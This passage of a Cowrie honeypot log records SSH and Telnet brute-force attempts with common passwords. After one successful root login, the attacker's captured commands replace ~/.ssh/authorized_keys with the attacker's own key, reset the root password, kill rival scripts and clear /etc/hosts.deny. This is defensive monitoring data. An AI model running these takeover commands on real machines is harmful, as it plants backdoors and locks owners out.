hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:55:05.735298Z","src_ip":"212.227.125.160","session":"1c7fb9d77bd4"}
{"eventid":"cowrie.login.failed","username":"ec2-user","password":"password","message":"login attempt [ec2-user/password] failed","sensor":"my-vps","timestamp":"2025-08-28T13:55:06.235934Z","src_ip":"212.227.125.160","session":"1c7fb9d77bd4"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:55:07.403126Z","src_ip":"212.227.125.160","session":"1c7fb9d77bd4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44814,"dst_ip":"1.2.3.4","dst_port":22,"session":"3af5066bad7d","protocol":"ssh","message":"New connection: 212.227.235.229:44814 (1.2.3.4:22) [session: 3af5066bad7d]","sensor":"my-vps","timestamp":"2025-08-28T13:55:35.130433Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:55:35.131565Z","src_ip":"212.227.235.229","session":"3af5066bad7d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:55:35.339925Z","src_ip":"212.227.235.229","session":"3af5066bad7d"}
{"eventid":"cowrie.login.failed","username":"vpn","password":"vpn@2025","message":"login attempt [vpn/vpn@2025] failed","sensor":"my-vps","timestamp":"2025-08-28T13:55:36.217297Z","src_ip":"212.227.235.229","session":"3af5066bad7d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:55:37.428789Z","src_ip":"212.227.235.229","session":"3af5066bad7d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54000,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed978a50cf88","protocol":"ssh","message":"New connection: 212.227.125.160:54000 (1.2.3.4:22) [session: ed978a50cf88]","sensor":"my-vps","timestamp":"2025-08-28T13:55:44.812584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:55:44.813818Z","src_ip":"212.227.125.160","session":"ed978a50cf88"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:55:44.988791Z","src_ip":"212.227.125.160","session":"ed978a50cf88"}
{"eventid":"cowrie.login.failed","username":"ec2-user","password":"123456789","message":"login attempt [ec2-user/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T13:55:45.517637Z","src_ip":"212.227.125.160","session":"ed978a50cf88"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:55:46.696097Z","src_ip":"212.227.125.160","session":"ed978a50cf88"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42544,"dst_ip":"1.2.3.4","dst_port":23,"session":"1c91815e14a0","protocol":"telnet","message":"New connection: 212.227.125.160:42544 (1.2.3.4:23) [session: 1c91815e14a0]","sensor":"my-vps","timestamp":"2025-08-28T13:55:58.372446Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T13:55:58.666826Z","src_ip":"212.227.125.160","session":"1c91815e14a0"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T13:55:59.783265Z","src_ip":"212.227.125.160","session":"1c91815e14a0"}
{"eventid":"cowrie.session.closed","duration":2.532702684402466,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:56:00.905043Z","src_ip":"212.227.125.160","session":"1c91815e14a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42550,"dst_ip":"1.2.3.4","dst_port":23,"session":"323398707431","protocol":"telnet","message":"New connection: 212.227.125.160:42550 (1.2.3.4:23) [session: 323398707431]","sensor":"my-vps","timestamp":"2025-08-28T13:56:00.938844Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:56:01.048383Z","src_ip":"212.227.125.160","session":"323398707431"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:56:01.528408Z","src_ip":"212.227.125.160","session":"323398707431"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T13:56:01.599130Z","src_ip":"212.227.125.160","session":"323398707431"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:56:02.911578Z","src_ip":"212.227.125.160","session":"323398707431"}
{"eventid":"cowrie.session.closed","duration":1.9790277481079102,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:56:02.917947Z","src_ip":"212.227.125.160","session":"323398707431"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39180,"dst_ip":"1.2.3.4","dst_port":22,"session":"202ea73d7cf2","protocol":"ssh","message":"New connection: 212.227.125.160:39180 (1.2.3.4:22) [session: 202ea73d7cf2]","sensor":"my-vps","timestamp":"2025-08-28T13:56:21.773143Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:56:21.774108Z","src_ip":"212.227.125.160","session":"202ea73d7cf2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:56:21.943662Z","src_ip":"212.227.125.160","session":"202ea73d7cf2"}
{"eventid":"cowrie.login.failed","username":"ec2-user","password":"12345","message":"login attempt [ec2-user/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T13:56:22.455613Z","src_ip":"212.227.125.160","session":"202ea73d7cf2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:56:23.628248Z","src_ip":"212.227.125.160","session":"202ea73d7cf2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44612,"dst_ip":"1.2.3.4","dst_port":22,"session":"344c4cf0011e","protocol":"ssh","message":"New connection: 212.227.125.160:44612 (1.2.3.4:22) [session: 344c4cf0011e]","sensor":"my-vps","timestamp":"2025-08-28T13:56:58.827063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:56:58.827989Z","src_ip":"212.227.125.160","session":"344c4cf0011e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:56:58.991749Z","src_ip":"212.227.125.160","session":"344c4cf0011e"}
{"eventid":"cowrie.login.failed","username":"ec2-user","password":"12345678","message":"login attempt [ec2-user/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T13:56:59.487774Z","src_ip":"212.227.125.160","session":"344c4cf0011e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:00.653594Z","src_ip":"212.227.125.160","session":"344c4cf0011e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48700,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc77f0c508ad","protocol":"ssh","message":"New connection: 212.227.235.229:48700 (1.2.3.4:22) [session: bc77f0c508ad]","sensor":"my-vps","timestamp":"2025-08-28T13:57:29.591206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:57:29.592993Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:57:29.800918Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.login.success","username":"root","password":"asd123ASD","message":"login attempt [root/asd123ASD] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:57:30.674115Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:31.110499Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:57:31.111367Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T13:57:31.112476Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:31.321965Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:31.799099Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T13:57:31.799965Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T13:57:32.011204Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:32.012247Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36432,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fe0835177e9","protocol":"ssh","message":"New connection: 212.227.125.160:36432 (1.2.3.4:22) [session: 4fe0835177e9]","sensor":"my-vps","timestamp":"2025-08-28T13:57:35.344833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:57:35.346121Z","src_ip":"212.227.125.160","session":"4fe0835177e9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:57:35.517248Z","src_ip":"212.227.125.160","session":"4fe0835177e9"}
{"eventid":"cowrie.login.failed","username":"ec2-user","password":"qwerty","message":"login attempt [ec2-user/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T13:57:36.038909Z","src_ip":"212.227.125.160","session":"4fe0835177e9"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:37.214835Z","src_ip":"212.227.125.160","session":"4fe0835177e9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:44.251776Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-28T13:57:44.252517Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:44.480684Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:44.957872Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"echo \"root:iQbxID48qaw1\"|chpasswd|bash","message":"CMD: echo \"root:iQbxID48qaw1\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-28T13:57:44.958639Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/466268b145404f6d40f81beda7f8106e89782857e3373679fcc11d15b2227daf","size":21,"shasum":"466268b145404f6d40f81beda7f8106e89782857e3373679fcc11d15b2227daf","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/466268b145404f6d40f81beda7f8106e89782857e3373679fcc11d15b2227daf after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:57:45.168047Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:57:45.605848Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-28T13:57:45.606546Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-28T13:57:45.818116Z","src_ip":"212.227.235.229","session":"bc77f0c508ad"}
